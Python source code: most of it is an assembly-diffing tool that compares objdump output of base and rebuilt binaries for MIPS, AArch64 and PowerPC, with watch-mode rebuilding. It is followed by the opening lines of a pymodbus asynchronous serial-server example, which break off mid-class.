(objdump_flags + maybe_get_objdump_source_flags(config), objfile, start),
)
def dump_binary(
start: str, end: Optional[str], config: Config, project: ProjectSettings
) -> Tuple[str, ObjdumpCommand, ObjdumpCommand]:
if not project.baseimg or not project.myimg:
fail("Missing myimg/baseimg in config.")
if config.make:
run_make(project.myimg, project)
start_addr = maybe_eval_int(start)
if start_addr is None:
_, start_addr = search_map_file(start, project)
if start_addr is None:
fail("Not able to find function in map file.")
if end is not None:
end_addr = eval_int(end, "End address must be an integer expression.")
else:
end_addr = start_addr + config.max_function_size_bytes
objdump_flags = ["-Dz", "-bbinary", "-EB"]
flags1 = [
f"--start-address={start_addr + config.base_shift}",
f"--stop-address={end_addr + config.base_shift}",
]
flags2 = [f"--start-address={start_addr}", f"--stop-address={end_addr}"]
return (
project.myimg,
(objdump_flags + flags1, project.baseimg, None),
(objdump_flags + flags2, project.myimg, None),
)
class DifferenceNormalizer:
def __init__(self, config: Config) -> None:
self.config = config
def normalize(self, mnemonic: str, row: str) -> str:
"""This should be called exactly once for each line."""
row = self._normalize_arch_specific(mnemonic, row)
if self.config.ignore_large_imms:
row = re.sub(self.config.arch.re_large_imm, "<imm>", row)
return row
def _normalize_arch_specific(self, mnemonic: str, row: str) -> str:
return row
class DifferenceNormalizerAArch64(DifferenceNormalizer):
def __init__(self, config: Config) -> None:
super().__init__(config)
self._adrp_pair_registers: Set[str] = set()
def _normalize_arch_specific(self, mnemonic: str, row: str) -> str:
if self.config.ignore_addr_diffs:
row = self._normalize_adrp_differences(mnemonic, row)
row = self._normalize_bl(mnemonic, row)
return row
def _normalize_bl(self, mnemonic: str, row: str) -> str:
if mnemonic != "bl":
return row
row, _ = split_off_branch(row)
return row
def _normalize_adrp_differences(self, mnemonic: str, row: str) -> str:
"""Identifies ADRP + LDR/ADD pairs that are used to access the GOT and
suppresses any immediate differences.
Whenever an ADRP is seen, the destination register is added to the set of registers
that are part of an ADRP + LDR/ADD pair. Registers are removed from the set as soon
as they are used for an LDR or ADD instruction which completes the pair.
This method is somewhat crude but should manage to detect most such pairs.
"""
row_parts = row.split("\t", 1)
if mnemonic == "adrp":
self._adrp_pair_registers.add(row_parts[1].strip().split(",")[0])
row, _ = split_off_branch(row)
elif mnemonic == "ldr":
for reg in self._adrp_pair_registers:
# ldr xxx, [reg]
# ldr xxx, [reg, <imm>]
if f", [{reg}" in row_parts[1]:
self._adrp_pair_registers.remove(reg)
return normalize_imms(row, AARCH64_SETTINGS)
elif mnemonic == "add":
for reg in self._adrp_pair_registers:
# add reg, reg, <imm>
if row_parts[1].startswith(f"{reg}, {reg}, "):
self._adrp_pair_registers.remove(reg)
return normalize_imms(row, AARCH64_SETTINGS)
return row
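# Illustrative (not executed): with --ignore-addr-diffs, an "adrp" that targets x8
# puts x8 into the pair set and drops its page address, and a following
# "ldr x9, [x8, #0x5d8]" completes the pair with its #0x5d8 immediate rewritten to
# <imm>, so GOT-offset churn between builds does not show up as a diff.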
@dataclass
class ArchSettings:
re_int: Pattern[str]
re_comment: Pattern[str]
re_reg: Pattern[str]
re_sprel: Pattern[str]
re_large_imm: Pattern[str]
re_imm: Pattern[str]
branch_instructions: Set[str]
instructions_with_address_immediates: Set[str]
forbidden: Set[str] = field(default_factory=lambda: set(string.ascii_letters + "_"))
arch_flags: List[str] = field(default_factory=list)
branch_likely_instructions: Set[str] = field(default_factory=set)
difference_normalizer: Type[DifferenceNormalizer] = DifferenceNormalizer
MIPS_BRANCH_LIKELY_INSTRUCTIONS = {
"beql",
"bnel",
"beqzl",
"bnezl",
"bgezl",
"bgtzl",
"blezl",
"bltzl",
"bc1tl",
"bc1fl",
}
MIPS_BRANCH_INSTRUCTIONS = MIPS_BRANCH_LIKELY_INSTRUCTIONS.union(
{
"b",
"beq",
"bne",
"beqz",
"bnez",
"bgez",
"bgtz",
"blez",
"bltz",
"bc1t",
"bc1f",
}
)
AARCH64_BRANCH_INSTRUCTIONS = {
"bl",
"b",
"b.eq",
"b.ne",
"b.cs",
"b.hs",
"b.cc",
"b.lo",
"b.mi",
"b.pl",
"b.vs",
"b.vc",
"b.hi",
"b.ls",
"b.ge",
"b.lt",
"b.gt",
"b.le",
"cbz",
"cbnz",
"tbz",
"tbnz",
}
PPC_BRANCH_INSTRUCTIONS = {
"b",
"beq",
"beq+",
"beq-",
"bne",
"bne+",
"bne-",
"blt",
"blt+",
"blt-",
"ble",
"ble+",
"ble-",
"bdnz",
"bdnz+",
"bdnz-",
"bge",
"bge+",
"bge-",
"bgt",
"bgt+",
"bgt-",
}
MIPS_SETTINGS = ArchSettings(
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"<.*?>"),
re_reg=re.compile(
r"\$?\b(a[0-3]|t[0-9]|s[0-8]|at|v[01]|f[12]?[0-9]|f3[01]|k[01]|fp|ra|zero)\b"
),
re_sprel=re.compile(r"(?<=,)([0-9]+|0x[0-9a-f]+)\(sp\)"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(\b|-)([0-9]+|0x[0-9a-fA-F]+)\b(?!\(sp)|%(lo|hi)\([^)]*\)"),
arch_flags=["-m", "mips:4300"],
branch_likely_instructions=MIPS_BRANCH_LIKELY_INSTRUCTIONS,
branch_instructions=MIPS_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=MIPS_BRANCH_INSTRUCTIONS.union({"jal", "j"}),
)
AARCH64_SETTINGS = ArchSettings(
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"(<.*?>|//.*$)"),
# GPRs and FP registers: X0-X30, W0-W30, [DSHQ]0..31
# The zero registers and SP should not be in this list.
re_reg=re.compile(r"\$?\b([dshq][12]?[0-9]|[dshq]3[01]|[xw][12]?[0-9]|[xw]30)\b"),
re_sprel=re.compile(r"sp, #-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(?<!sp, )#-?(0x[0-9a-fA-F]+|[0-9]+)\b"),
branch_instructions=AARCH64_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=AARCH64_BRANCH_INSTRUCTIONS.union({"adrp"}),
difference_normalizer=DifferenceNormalizerAArch64,
)
PPC_SETTINGS = ArchSettings(
re_int=re.compile(r"[0-9]+"),
re_comment=re.compile(r"(<.*?>|//.*$)"),
re_reg=re.compile(r"\$?\b([rf][0-9]+)\b"),
re_sprel=re.compile(r"(?<=,)(-?[0-9]+|-?0x[0-9a-f]+)\(r1\)"),
re_large_imm=re.compile(r"-?[1-9][0-9]{2,}|-?0x[0-9a-f]{3,}"),
re_imm=re.compile(r"(\b|-)([0-9]+|0x[0-9a-fA-F]+)\b(?!\(r1)|[^@]*@(ha|h|lo)"),
branch_instructions=PPC_BRANCH_INSTRUCTIONS,
instructions_with_address_immediates=PPC_BRANCH_INSTRUCTIONS.union({"bl"}),
)
def hexify_int(row: str, pat: Match[str], arch: ArchSettings) -> str:
full = pat.group(0)
if len(full) <= 1:
# leave one-digit ints alone
return full
start, end = pat.span()
if start and row[start - 1] in arch.forbidden:
return full
if end < len(row) and row[end] in arch.forbidden:
return full
return hex(int(full))
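# For example (illustrative): a match on "1000" in "addiu\t$a0,$a0,1000" becomes
# "0x3e8", while single-digit immediates and digits adjacent to identifier
# characters (as in "LO16") are left unchanged.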
def parse_relocated_line(line: str) -> Tuple[str, str, str]:
for c in ",\t ":
if c in line:
ind2 = line.rindex(c)
break
else:
raise Exception(f"failed to parse relocated line: {line}")
before = line[: ind2 + 1]
after = line[ind2 + 1 :]
ind2 = after.find("(")
if ind2 == -1:
imm, after = after, ""
else:
imm, after = after[:ind2], after[ind2:]
if imm == "0x0":
imm = "0"
return before, imm, after
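# For example (illustrative): parse_relocated_line("lw\t$a0,0x10($v0)") splits at
# the last separator and returns before="lw\t$a0,", imm="0x10", after="($v0)",
# so the relocation handlers below only have to rewrite the immediate part.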
def process_mips_reloc(row: str, prev: str, arch: ArchSettings) -> str:
before, imm, after = parse_relocated_line(prev)
repl = row.split()[-1]
if imm != "0":
# MIPS uses relocations with addends embedded in the code as immediates.
# If there is an immediate, show it as part of the relocation. Ideally
# we'd show this addend in both %lo/%hi, but annoyingly objdump's output
# doesn't include enough information to pair up %lo's and %hi's...
# TODO: handle unambiguous cases where all addends for a symbol are the
# same, or show "+???".
mnemonic = prev.split()[0]
if (
mnemonic in arch.instructions_with_address_immediates
and not imm.startswith("0x")
):
imm = "0x" + imm
repl += "+" + imm if int(imm, 0) > 0 else imm
if "R_MIPS_LO16" in row:
repl = f"%lo({repl})"
elif "R_MIPS_HI16" in row:
# Ideally we'd pair up R_MIPS_LO16 and R_MIPS_HI16 to generate a
# correct addend for each, but objdump doesn't give us the order of
# the relocations, so we can't find the right LO16. :(
repl = f"%hi({repl})"
elif "R_MIPS_26" in row:
# Function calls
pass
elif "R_MIPS_PC16" in row:
# Branch to glabel. This gives confusing output, but there's not much
# we can do here.
pass
else:
assert False, f"unknown relocation type '{row}' for line '{prev}'"
return before + repl + after
def process_ppc_reloc(row: str, prev: str) -> str:
assert any(
r in row for r in ["R_PPC_REL24", "R_PPC_ADDR16", "R_PPC_EMB_SDA21"]
), f"unknown relocation type '{row}' for line '{prev}'"
before, imm, after = parse_relocated_line(prev)
repl = row.split()[-1]
if "R_PPC_REL24" in row:
# function calls
pass
elif "R_PPC_ADDR16_HI" in row:
# absolute hi of addr
repl = f"{repl}@h"
elif "R_PPC_ADDR16_HA" in row:
# adjusted hi of addr
repl = f"{repl}@ha"
elif "R_PPC_ADDR16_LO" in row:
# lo of addr
repl = f"{repl}@l"
elif "R_PPC_ADDR16" in row:
# 16-bit absolute addr
if "+0x7" in repl:
# remove the very large addends as they are an artifact of (label-_SDA(2)_BASE_)
# computations and are unimportant in a diff setting.
if int(repl.split("+")[1], 16) > 0x70000000:
repl = repl.split("+")[0]
elif "R_PPC_EMB_SDA21" in row:
# small data area
pass
return before + repl + after
def pad_mnemonic(line: str) -> str:
if "\t" not in line:
return line
mn, args = line.split("\t", 1)
return f"{mn:<7s} {args}"
@dataclass
class Line:
mnemonic: str
diff_row: str
original: str
normalized_original: str
line_num: str
branch_target: Optional[str]
source_lines: List[str]
comment: Optional[str]
def process(lines: List[str], config: Config) -> List[Line]:
arch = config.arch
normalizer = arch.difference_normalizer(config)
skip_next = False
source_lines = []
if not config.diff_obj:
lines = lines[7:]
if lines and not lines[-1]:
lines.pop()
output: List[Line] = []
stop_after_delay_slot = False
for row in lines:
if config.diff_obj and (">:" in row or not row):
continue
if config.source and not config.source_old_binutils and (row and row[0] != " "):
source_lines.append(row)
continue
if "R_AARCH64_" in row:
# TODO: handle relocation
continue
if "R_MIPS_" in row:
# N.B. Don't transform the diff rows, they already ignore immediates
# if output[-1].diff_row != "<delay-slot>":
# output[-1] = output[-1].replace(diff_row=process_mips_reloc(row, output[-1].row_with_imm, arch))
new_original = process_mips_reloc(row, output[-1].original, arch)
output[-1] = replace(output[-1], original=new_original)
continue
if "R_PPC_" in row:
new_original = process_ppc_reloc(row, output[-1].original)
output[-1] = replace(output[-1], original=new_original)
continue
# match source lines here to avoid matching relocation lines
if (
config.source
and config.source_old_binutils
and (row and not re.match(r"^ +[0-9a-f]+:\t", row))
):
source_lines.append(row)
continue
m_comment = re.search(arch.re_comment, row)
comment = m_comment[0] if m_comment else None
row = re.sub(arch.re_comment, "", row)
row = row.rstrip()
tabs = row.split("\t")
row = "\t".join(tabs[2:])
line_num = tabs[0].strip()
if "\t" in row:
row_parts = row.split("\t", 1)
else:
# powerpc-eabi-objdump doesn't use tabs
row_parts = [part.lstrip() for part in row.split(" ", 1)]
mnemonic = row_parts[0].strip()
if mnemonic not in arch.instructions_with_address_immediates:
row = re.sub(arch.re_int, lambda m: hexify_int(row, m, arch), row)
original = row
normalized_original = normalizer.normalize(mnemonic, original)
if skip_next:
skip_next = False
row = "<delay-slot>"
mnemonic = "<delay-slot>"
if mnemonic in arch.branch_likely_instructions:
skip_next = True
row = re.sub(arch.re_reg, "<reg>", row)
row = re.sub(arch.re_sprel, "addr(sp)", row)
row_with_imm = row
if mnemonic in arch.instructions_with_address_immediates:
row = row.strip()
row, _ = split_off_branch(row)
row += "<imm>"
else:
row = normalize_imms(row, arch)
branch_target = None
if mnemonic in arch.branch_instructions:
target = int(row_parts[1].strip().split(",")[-1], 16)
if mnemonic in arch.branch_likely_instructions:
target -= 4
branch_target = hex(target)[2:]
output.append(
Line(
mnemonic=mnemonic,
diff_row=row,
original=original,
normalized_original=normalized_original,
line_num=line_num,
branch_target=branch_target,
source_lines=source_lines,
comment=comment,
)
)
source_lines = []
if config.stop_jrra and mnemonic == "jr" and row_parts[1].strip() == "ra":
stop_after_delay_slot = True
elif stop_after_delay_slot:
break
return output
def normalize_imms(row: str, arch: ArchSettings) -> str:
return re.sub(arch.re_imm, "<imm>", row)
def normalize_stack(row: str, arch: ArchSettings) -> str:
return re.sub(arch.re_sprel, "addr(sp)", row)
def split_off_branch(line: str) -> Tuple[str, str]:
parts = line.split(",")
if len(parts) < 2:
parts = line.split(None, 1)
off = len(line) - len(parts[-1])
return line[:off], line[off:]
def diff_sequences_difflib(
seq1: List[str], seq2: List[str]
) -> List[Tuple[str, int, int, int, int]]:
differ = difflib.SequenceMatcher(a=seq1, b=seq2, autojunk=False)
return differ.get_opcodes()
def diff_sequences(
seq1: List[str], seq2: List[str], algorithm: str
) -> List[Tuple[str, int, int, int, int]]:
if (
algorithm != "levenshtein"
or len(seq1) * len(seq2) > 4 * 10 ** 8
or len(seq1) + len(seq2) >= 0x110000
):
return diff_sequences_difflib(seq1, seq2)
# The Levenshtein library assumes that we compare strings, not lists. Convert.
# (Per the check above we know we have fewer than 0x110000 unique elements, so chr() works.)
remapping: Dict[str, str] = {}
def remap(seq: List[str]) -> str:
seq = seq[:]
for i in range(len(seq)):
val = remapping.get(seq[i])
if val is None:
val = chr(len(remapping))
remapping[seq[i]] = val
seq[i] = val
return "".join(seq)
rem1 = remap(seq1)
rem2 = remap(seq2)
import Levenshtein # type: ignore
return Levenshtein.opcodes(rem1, rem2) # type: ignore
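# Illustrative trace of the remapping above (assumes python-Levenshtein is
# installed): with a fresh remapping table, remap(["lw", "addiu", "lw"]) yields
# "\x00\x01\x00" and a following remap(["lw", "jr"]) yields "\x00\x02", so the two
# mnemonic streams can be compared as ordinary strings.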
def diff_lines(
lines1: List[Line],
lines2: List[Line],
algorithm: str,
) -> List[Tuple[Optional[Line], Optional[Line]]]:
ret = []
for (tag, i1, i2, j1, j2) in diff_sequences(
[line.mnemonic for line in lines1],
[line.mnemonic for line in lines2],
algorithm,
):
for line1, line2 in itertools.zip_longest(lines1[i1:i2], lines2[j1:j2]):
if tag == "replace":
if line1 is None:
tag = "insert"
elif line2 is None:
tag = "delete"
elif tag == "insert":
assert line1 is None
elif tag == "delete":
assert line2 is None
ret.append((line1, line2))
return ret
@dataclass(frozen=True)
class OutputLine:
base: Optional[Text] = field(compare=False)
fmt2: Text = field(compare=False)
key2: Optional[str]
def do_diff(basedump: str, mydump: str, config: Config) -> List[OutputLine]:
if config.source:
import cxxfilt # type: ignore
arch = config.arch
fmt = config.formatter
output: List[OutputLine] = []
lines1 = process(basedump.split("\n"), config)
lines2 = process(mydump.split("\n"), config)
sc1 = symbol_formatter("base-reg", 0)
sc2 = symbol_formatter("my-reg", 0)
sc3 = symbol_formatter("base-stack", 4)
sc4 = symbol_formatter("my-stack", 4)
sc5 = symbol_formatter("base-branch", 0)
sc6 = symbol_formatter("my-branch", 0)
bts1: Set[str] = set()
bts2: Set[str] = set()
if config.show_branches:
for (lines, btset, sc) in [
(lines1, bts1, sc5),
(lines2, bts2, sc6),
]:
for line in lines:
bt = line.branch_target
if bt is not None:
text = f"{bt}:"
btset.add(text)
sc(text)
for (line1, line2) in diff_lines(lines1, lines2, config.algorithm):
line_color1 = line_color2 = sym_color = BasicFormat.NONE
line_prefix = " "
out1 = Text() if not line1 else Text(pad_mnemonic(line1.original))
out2 = Text() if not line2 else Text(pad_mnemonic(line2.original))
if line1 and line2 and line1.diff_row == line2.diff_row:
if line1.normalized_original == line2.normalized_original:
pass
elif line1.diff_row == "<delay-slot>":
out1 = out1.reformat(BasicFormat.DELAY_SLOT)
out2 = out2.reformat(BasicFormat.DELAY_SLOT)
else:
mnemonic = line1.original.split()[0]
branch1 = branch2 = Text()
if mnemonic in arch.instructions_with_address_immediates:
out1, branch1 = map(Text, split_off_branch(out1.plain()))
out2, branch2 = map(Text, split_off_branch(out2.plain()))
branchless1 = out1.plain()
branchless2 = out2.plain()
out1, out2 = format_fields(
arch.re_imm, out1, out2, lambda _: BasicFormat.IMMEDIATE
)
same_relative_target = False
if line1.branch_target is not None and line2.branch_target is not None:
relative_target1 = eval_line_num(
line1.branch_target
) - eval_line_num(line1.line_num)
relative_target2 = eval_line_num(
line2.branch_target
) - eval_line_num(line2.line_num)
same_relative_target = relative_target1 == relative_target2
if not same_relative_target and branch1.plain() != branch2.plain():
branch1 = branch1.reformat(BasicFormat.IMMEDIATE)
branch2 = branch2.reformat(BasicFormat.IMMEDIATE)
out1 += branch1
out2 += branch2
if normalize_imms(branchless1, arch) == normalize_imms(
branchless2, arch
):
if not same_relative_target:
# only imms differences
sym_color = BasicFormat.IMMEDIATE
line_prefix = "i"
else:
out1, out2 = format_fields(arch.re_sprel, out1, out2, sc3, sc4)
if normalize_stack(branchless1, arch) == normalize_stack(
branchless2, arch
):
# only stack differences (luckily stack and imm
# differences can't be combined in MIPS, so we
# don't have to think about that case)
sym_color = BasicFormat.STACK
line_prefix = "s"
else:
# regs differences and maybe imms as well
out1, out2 = format_fields(arch.re_reg, out1, out2, sc1, sc2)
line_color1 = line_color2 = sym_color = BasicFormat.REGISTER
line_prefix = "r"
elif line1 and line2:
line_prefix = "|"
line_color1 = line_color2 = sym_color = BasicFormat.DIFF_CHANGE
out1 = out1.reformat(line_color1)
out2 = out2.reformat(line_color2)
elif line1:
line_prefix = "<"
line_color1 = sym_color = BasicFormat.DIFF_REMOVE
out1 = out1.reformat(line_color1)
out2 = Text()
elif line2:
line_prefix = ">"
line_color2 = sym_color = BasicFormat.DIFF_ADD
out1 = Text()
out2 = out2.reformat(line_color2)
if config.source and line2 and line2.comment:
out2 += f" {line2.comment}"
def format_part(
out: Text,
line: Optional[Line],
line_color: Format,
btset: Set[str],
sc: FormatFunction,
) -> Optional[Text]:
if line is None:
return None
in_arrow = Text(" ")
out_arrow = Text()
if config.show_branches:
if line.line_num in btset:
in_arrow = Text("~>", sc(line.line_num))
if line.branch_target is not None:
out_arrow = " " + Text("~>", sc(line.branch_target + ":"))
return (
Text(line.line_num, line_color) + " " + in_arrow + " " + out + out_arrow
)
part1 = format_part(out1, line1, line_color1, bts1, sc5)
part2 = format_part(out2, line2, line_color2, bts2, sc6)
key2 = line2.original if line2 else None
if line2:
for source_line in line2.source_lines:
line_format = BasicFormat.SOURCE_OTHER
if config.source_old_binutils:
if source_line and re.fullmatch(r".*\.c(?:pp)?:\d+", source_line):
line_format = BasicFormat.SOURCE_FILENAME
elif source_line and source_line.endswith("():"):
line_format = BasicFormat.SOURCE_FUNCTION
try:
source_line = cxxfilt.demangle(
source_line[:-3], external_only=False
)
except Exception:
pass
else:
# File names and function names
if source_line and source_line[0] != "│":
line_format = BasicFormat.SOURCE_FILENAME
# Function names
if source_line.endswith("():"):
line_format = BasicFormat.SOURCE_FUNCTION
try:
source_line = cxxfilt.demangle(
source_line[:-3], external_only=False
)
except Exception:
pass
output.append(
OutputLine(
None,
" " + Text(source_line, line_format),
source_line,
)
)
fmt2 = Text(line_prefix, sym_color) + " " + (part2 or Text())
output.append(OutputLine(part1, fmt2, key2))
return output
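# Group an OutputLine list into chunks: runs of right-only lines (e.g. source
# annotations with no base text) are collected into lists between the lines
# that do have a base.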
def chunk_diff(diff: List[OutputLine]) -> List[Union[List[OutputLine], OutputLine]]:
cur_right: List[OutputLine] = []
chunks: List[Union[List[OutputLine], OutputLine]] = []
for output_line in diff:
if output_line.base is not None:
chunks.append(cur_right)
chunks.append(output_line)
cur_right = []
else:
cur_right.append(output_line)
chunks.append(cur_right)
return chunks
def format_diff(
old_diff: List[OutputLine], new_diff: List[OutputLine], config: Config
) -> Tuple[Optional[Tuple[str, ...]], List[Tuple[str, ...]]]:
fmt = config.formatter
old_chunks = chunk_diff(old_diff)
new_chunks = chunk_diff(new_diff)
output: List[Tuple[Text, OutputLine, OutputLine]] = []
assert len(old_chunks) == len(new_chunks), "same target"
empty = OutputLine(Text(), Text(), None)
for old_chunk, new_chunk in zip(old_chunks, new_chunks):
if isinstance(old_chunk, list):
assert isinstance(new_chunk, list)
if not old_chunk and not new_chunk:
# Most of the time lines sync up without insertions/deletions,
# and there's no interdiffing to be done.
continue
differ = difflib.SequenceMatcher(a=old_chunk, b=new_chunk, autojunk=False)
for (tag, i1, i2, j1, j2) in differ.get_opcodes():
if tag in ["equal", "replace"]:
for i, j in zip(range(i1, i2), range(j1, j2)):
output.append((Text(), old_chunk[i], new_chunk[j]))
if tag in ["insert", "replace"]:
for j in range(j1 + i2 - i1, j2):
output.append((Text(), empty, new_chunk[j]))
if tag in ["delete", "replace"]:
for i in range(i1 + j2 - j1, i2):
output.append((Text(), old_chunk[i], empty))
else:
assert isinstance(new_chunk, OutputLine)
assert new_chunk.base
# old_chunk.base and new_chunk.base have the same text since
# both diffs are based on the same target, but they might
# differ in color. Use the new version.
output.append((new_chunk.base, old_chunk, new_chunk))
# TODO: status line, with e.g. approximate permuter score?
header_line: Optional[Tuple[str, ...]]
diff_lines: List[Tuple[str, ...]]
if config.threeway:
header_line = ("TARGET", " CURRENT", " PREVIOUS")
diff_lines = [
(
fmt.apply(base),
fmt.apply(new.fmt2),
fmt.apply(old.fmt2) or "-" if old != new else "",
)
for (base, old, new) in output
]
else:
header_line = None
diff_lines = [
(fmt.apply(base), fmt.apply(new.fmt2))
for (base, old, new) in output
if base or new.key2 is not None
]
return header_line, diff_lines
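# Watch the given files/directories with watchdog and post debounced change
# timestamps to outq from a background daemon thread.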
def debounced_fs_watch(
targets: List[str],
outq: "queue.Queue[Optional[float]]",
config: Config,
project: ProjectSettings,
) -> None:
import watchdog.events # type: ignore
import watchdog.observers # type: ignore
class WatchEventHandler(watchdog.events.FileSystemEventHandler): # type: ignore
def __init__(
self, queue: "queue.Queue[float]", file_targets: List[str]
) -> None:
self.queue = queue
self.file_targets = file_targets
def on_modified(self, ev: object) -> None:
if isinstance(ev, watchdog.events.FileModifiedEvent):
self.changed(ev.src_path)
def on_moved(self, ev: object) -> None:
if isinstance(ev, watchdog.events.FileMovedEvent):
self.changed(ev.dest_path)
def should_notify(self, path: str) -> bool:
for target in self.file_targets:
if os.path.normpath(path) == target:
return True
if config.make and any(
path.endswith(suffix) for suffix in project.source_extensions
):
return True
return False
def changed(self, path: str) -> None:
if self.should_notify(path):
self.queue.put(time.time())
def debounce_thread() -> NoReturn:
listenq: "queue.Queue[float]" = queue.Queue()
file_targets: List[str] = []
event_handler = WatchEventHandler(listenq, file_targets)
observer = watchdog.observers.Observer()
observed = set()
for target in targets:
if os.path.isdir(target):
observer.schedule(event_handler, target, recursive=True)
else:
file_targets.append(os.path.normpath(target))
target = os.path.dirname(target) or "."
if target not in observed:
observed.add(target)
observer.schedule(event_handler, target)
observer.start()
while True:
t = listenq.get()
more = True
while more:
delay = t + DEBOUNCE_DELAY - time.time()
if delay > 0:
time.sleep(delay)
# consume entire queue
more = False
try:
while True:
t = listenq.get(block=False)
more = True
except queue.Empty:
pass
outq.put(t)
th = threading.Thread(target=debounce_thread, daemon=True)
th.start()
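# Interactive display that renders the diff through a pager (via BUFFER_CMD and
# LESS_CMD) and supports asynchronous refreshes while watch mode rebuilds.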
class Display:
basedump: str
mydump: str
config: Config
emsg: Optional[str]
last_diff_output: Optional[List[OutputLine]]
pending_update: Optional[Tuple[str, bool]]
ready_queue: "queue.Queue[None]"
watch_queue: "queue.Queue[Optional[float]]"
less_proc: "Optional[subprocess.Popen[bytes]]"
def __init__(self, basedump: str, mydump: str, config: Config) -> None:
self.config = config
self.basedump = basedump
self.mydump = mydump
self.emsg = None
self.last_diff_output = None
def run_diff(self) -> str:
if self.emsg is not None:
return self.emsg
diff_output = do_diff(self.basedump, self.mydump, self.config)
last_diff_output = self.last_diff_output or diff_output
if self.config.threeway != "base" or not self.last_diff_output:
self.last_diff_output = diff_output
header, diff_lines = format_diff(last_diff_output, diff_output, self.config)
return self.config.formatter.table(header, diff_lines[self.config.skip_lines :])
def run_less(self) -> "Tuple[subprocess.Popen[bytes], subprocess.Popen[bytes]]":
output = self.run_diff()
# Pipe the output through 'tail' and only then to less, to ensure the
# write call doesn't block. ('tail' has to buffer all its input before
# it starts writing.) This also means we don't have to deal with pipe
# closure errors.
buffer_proc = subprocess.Popen(
BUFFER_CMD, stdin=subprocess.PIPE, stdout=subprocess.PIPE
)
less_proc = subprocess.Popen(LESS_CMD, stdin=buffer_proc.stdout)
assert buffer_proc.stdin
assert buffer_proc.stdout
buffer_proc.stdin.write(output.encode())
buffer_proc.stdin.close()
buffer_proc.stdout.close()
return (buffer_proc, less_proc)
def run_sync(self) -> None:
proca, procb = self.run_less()
procb.wait()
proca.wait()
def run_async(self, watch_queue: "queue.Queue[Optional[float]]") -> None:
self.watch_queue = watch_queue
self.ready_queue = queue.Queue()
self.pending_update = None
dthread = threading.Thread(target=self.display_thread)
dthread.start()
self.ready_queue.get()
def display_thread(self) -> None:
proca, procb = self.run_less()
self.less_proc = procb
self.ready_queue.put(None)
while True:
ret = procb.wait()
proca.wait()
self.less_proc = None
if ret != 0:
# fix the terminal
os.system("tput reset")
if ret != 0 and self.pending_update is not None:
# killed by program with the intent to refresh
msg, error = self.pending_update
self.pending_update = None
if not error:
self.mydump = msg
self.emsg = None
else:
self.emsg = msg
proca, procb = self.run_less()
self.less_proc = procb
self.ready_queue.put(None)
else:
# terminated by user, or killed
self.watch_queue.put(None)
self.ready_queue.put(None)
break
def progress(self, msg: str) -> None:
# Write message to top-left corner
sys.stdout.write("\x1b7\x1b[1;1f{}\x1b8".format(msg + " "))
sys.stdout.flush()
def update(self, text: str, error: bool) -> None:
if not error and not self.emsg and text == self.mydump:
self.progress("Unchanged. ")
return
self.pending_update = (text, error)
if not self.less_proc:
return
self.less_proc.kill()
self.ready_queue.get()
def terminate(self) -> None:
if not self.less_proc:
return
self.less_proc.kill()
self.ready_queue.get()
def main() -> None:
args = parser.parse_args()
# Apply project-specific configuration.
settings: Dict[str, Any] = {}
diff_settings.apply(settings, args) # type: ignore
project = create_project_settings(settings)
config = create_config(args, project)
if config.algorithm == "levenshtein":
try:
import Levenshtein
except ModuleNotFoundError as e:
fail(MISSING_PREREQUISITES.format(e.name))
if config.source:
try:
import cxxfilt
except ModuleNotFoundError as e:
fail(MISSING_PREREQUISITES.format(e.name))
if config.threeway and not args.watch:
fail("Threeway diffing requires -w.")
if args.diff_elf_symbol:
make_target, basecmd, mycmd = dump_elf(
args.start, args.end, args.diff_elf_symbol, config, project
)
elif config.diff_obj:
make_target, basecmd, mycmd = dump_objfile(
args.start, args.end, config, project
)
else:
make_target, basecmd, mycmd = dump_binary(args.start, args.end, config, project)
map_build_target_fn = getattr(diff_settings, "map_build_target", None)
if map_build_target_fn:
make_target = map_build_target_fn(make_target=make_target)
if args.write_asm is not None:
mydump = run_objdump(mycmd, config, project)
with open(args.write_asm, "w") as f:
f.write(mydump)
print(f"Wrote assembly to {args.write_asm}.")
sys.exit(0)
if args.base_asm is not None:
with open(args.base_asm) as f:
basedump = f.read()
else:
basedump = run_objdump(basecmd, config, project)
mydump = run_objdump(mycmd, config, project)
display = Display(basedump, mydump, config)
if args.no_pager or args.format == "html":
print(display.run_diff())
elif not args.watch:
display.run_sync()
else:
if not args.make:
yn = input(
"Warning: watch-mode (-w) enabled without auto-make (-m). "
"You will have to run make manually. Ok? (Y/n) "
)
if yn.lower() == "n":
return
if args.make:
watch_sources = None
watch_sources_for_target_fn = getattr(
diff_settings, "watch_sources_for_target", None
)
if watch_sources_for_target_fn:
watch_sources = watch_sources_for_target_fn(make_target)
watch_sources = watch_sources or project.source_directories
if not watch_sources:
fail("Missing source_directories config, don't know what to watch.")
else:
watch_sources = [make_target]
q: "queue.Queue[Optional[float]]" = queue.Queue()
debounced_fs_watch(watch_sources, q, config, project)
display.run_async(q)
last_build = 0.0
try:
while True:
t = q.get()
if t is None:
break
if t < last_build:
continue
last_build = time.time()
if args.make:
display.progress("Building...")
ret = run_make_capture_output(make_target, project)
if ret.returncode != 0:
display.update(
ret.stderr.decode("utf-8-sig", "replace")
or ret.stdout.decode("utf-8-sig", "replace"),
error=True,
)
continue
mydump = run_objdump(mycmd, config, project)
display.update(mydump, error=False)
except KeyboardInterrupt:
display.terminate()
if __name__ == "__main__":
main()
|
rtu_slave.py
|
#!/usr/bin/env python
'''
Pymodbus Asynchronous Server Example
--------------------------------------------------------------------------
The asynchronous server is a high-performance implementation using the
twisted library as its backend. This allows it to scale to many thousands
of nodes, which can be helpful for testing monitoring software.
'''
import logging
#---------------------------------------------------------------------------#
# import the various server implementations
#---------------------------------------------------------------------------#
#from pymodbus.server.async import StartTcpServer
#from pymodbus.server.async import StartUdpServer
from pymodbus.server.asynchronous import StartSerialServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSequentialDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer, ModbusAsciiFramer
from os import readlink
class ModbusSerialServer:
#---------------------------------------------------------------------------#
# configure the service logging
#---------------------------------------------------------------------------#
